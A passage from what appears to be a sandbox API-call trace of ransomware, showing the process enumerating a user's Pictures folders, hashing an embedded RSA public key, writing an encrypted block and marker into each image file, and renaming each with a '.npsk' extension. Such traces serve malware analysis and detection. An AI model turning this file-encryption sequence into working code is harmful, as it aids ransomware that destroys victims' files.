KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.699] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.699] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.700] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.700] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.700] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.700] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.700] GetLastError () returned 0x0 [0216.700] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.700] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.700] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.700] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.700] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.701] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.701] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x173f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.701] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.702] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.702] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.702] CloseHandle (hObject=0x61c) returned 1 [0216.703] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\oC1m.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\oc1m.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\oC1m.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\oc1m.png.npsk")) returned 1 [0216.705] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8b990c0, ftCreationTime.dwHighDateTime=0x1d5dc24, ftLastAccessTime.dwLowDateTime=0x4f821e30, ftLastAccessTime.dwHighDateTime=0x1d5da1a, ftLastWriteTime.dwLowDateTime=0x4f821e30, ftLastWriteTime.dwHighDateTime=0x1d5da1a, nFileSizeHigh=0x0, nFileSizeLow=0x2f63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sL6bCpF9gVyAqd.gif", cAlternateFileName="SL6BCP~1.GIF")) returned 1 [0216.705] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\sL6bCpF9gVyAqd.gif") returned=".gif" [0216.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\sL6bCpF9gVyAqd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\sl6bcpf9gvyaqd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.706] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=12131) returned 1 [0216.706] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.708] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2f3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.708] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.710] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x2f63, lpOverlapped=0x0) returned 1 [0216.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.711] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.711] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.711] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.712] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.712] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.712] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.712] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.712] GetLastError () returned 0x0 [0216.712] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.712] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.712] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.712] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.712] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.712] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.713] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2f63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.713] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.713] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.713] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.713] CloseHandle (hObject=0x61c) returned 1 [0216.714] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\sL6bCpF9gVyAqd.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\sl6bcpf9gvyaqd.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\sL6bCpF9gVyAqd.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\sl6bcpf9gvyaqd.gif.npsk")) returned 1 [0216.716] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8b990c0, ftCreationTime.dwHighDateTime=0x1d5dc24, ftLastAccessTime.dwLowDateTime=0x4f821e30, ftLastAccessTime.dwHighDateTime=0x1d5da1a, ftLastWriteTime.dwLowDateTime=0x4f821e30, ftLastWriteTime.dwHighDateTime=0x1d5da1a, nFileSizeHigh=0x0, nFileSizeLow=0x2f63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sL6bCpF9gVyAqd.gif", cAlternateFileName="SL6BCP~1.GIF")) returned 0 [0216.716] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.716] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.716] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.716] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\") returned="WVIC0My\\" [0216.716] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0216.716] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.716] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.716] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.717] PathFindFileNameW (pszPath="") returned="" [0216.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9e6a260, ftCreationTime.dwHighDateTime=0x1d5df82, ftLastAccessTime.dwLowDateTime=0x59132c20, ftLastAccessTime.dwHighDateTime=0x1d5e382, ftLastWriteTime.dwLowDateTime=0x59132c20, ftLastWriteTime.dwHighDateTime=0x1d5e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.718] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9e6a260, ftCreationTime.dwHighDateTime=0x1d5df82, ftLastAccessTime.dwLowDateTime=0x59132c20, ftLastAccessTime.dwHighDateTime=0x1d5e382, ftLastWriteTime.dwLowDateTime=0x59132c20, ftLastWriteTime.dwHighDateTime=0x1d5e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.718] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1179f2e0, ftCreationTime.dwHighDateTime=0x1d5dd29, ftLastAccessTime.dwLowDateTime=0xf6c65c60, ftLastAccessTime.dwHighDateTime=0x1d5e6bd, ftLastWriteTime.dwLowDateTime=0xf6c65c60, ftLastWriteTime.dwHighDateTime=0x1d5e6bd, nFileSizeHigh=0x0, nFileSizeLow=0x151cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9IGV0M5_ lad4RfbopFB.jpg", cAlternateFileName="9IGV0M~1.JPG")) returned 1 [0216.718] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\9IGV0M5_ lad4RfbopFB.jpg") returned=".jpg" [0216.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\9IGV0M5_ lad4RfbopFB.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\9igv0m5_ lad4rfbopfb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.718] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=86476) returned 1 [0216.718] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.720] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x151a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.720] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.722] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x151cc, lpOverlapped=0x0) returned 1 [0216.723] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.723] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.723] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.723] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.724] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.724] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.724] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.724] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.724] GetLastError () returned 0x0 [0216.725] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.725] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.725] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.725] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.725] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.725] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.726] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x151cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.726] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.727] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.727] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.727] CloseHandle (hObject=0x61c) returned 1 [0216.729] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\9IGV0M5_ lad4RfbopFB.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\9igv0m5_ lad4rfbopfb.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\9IGV0M5_ lad4RfbopFB.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\9igv0m5_ lad4rfbopfb.jpg.npsk")) returned 1 [0216.731] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99bf4e0, ftCreationTime.dwHighDateTime=0x1d5db50, ftLastAccessTime.dwLowDateTime=0xaa4f4490, ftLastAccessTime.dwHighDateTime=0x1d5de71, ftLastWriteTime.dwLowDateTime=0xaa4f4490, ftLastWriteTime.dwHighDateTime=0x1d5de71, nFileSizeHigh=0x0, nFileSizeLow=0x7460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dDSNcwG BqFC.png", cAlternateFileName="DDSNCW~1.PNG")) returned 1 [0216.731] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\dDSNcwG BqFC.png") returned=".png" [0216.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\dDSNcwG BqFC.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wvic0my\\ddsncwg bqfc.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.731] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=29792) returned 1 [0216.731] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.733] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x743a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.733] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.735] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x7460, lpOverlapped=0x0) returned 1 [0216.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.736] lstrlenA (lpString="-----BEGIN PUBLIC 